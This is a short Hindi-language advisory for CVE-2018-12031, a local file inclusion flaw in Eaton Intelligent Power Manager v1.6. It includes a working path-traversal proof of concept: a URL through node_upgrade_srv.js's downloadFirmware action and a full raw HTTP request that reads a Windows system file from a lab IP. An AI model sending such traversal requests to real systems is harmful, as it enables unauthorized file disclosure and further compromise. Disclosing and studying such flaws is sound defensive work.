
CVE-2018-12031 | Eaton Intelligent Power Manager v1.6 में LFI एक हमलावर को फ़ाइल शामिल करने की अनुमति देता है, जिससे संवेदनशील जानकारी का रिसाव, सेवा से वंचित करना और कोड निष्पादन हो सकता है।
Eaton Intelligent Power Manager v1.6 में स्थानीय फ़ाइल समावेशन (Local File Inclusion) एक हमलावर को एक फ़ाइल शामिल करने की अनुमति देता है, जिससे संवेदनशील जानकारी का खुलासा, सेवा से वंचित (Denial of Service) और कोड निष्पादन हो सकता है।
भेद्यता का शोषण करने के लिए, कोई व्यक्ति लक्ष्य से कुछ जानकारी प्राप्त करने हेतु 'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../' अनुरोध का उपयोग कर सकता है।
GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host HTTP/1.1
Host: 192.168.45.138:4680
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
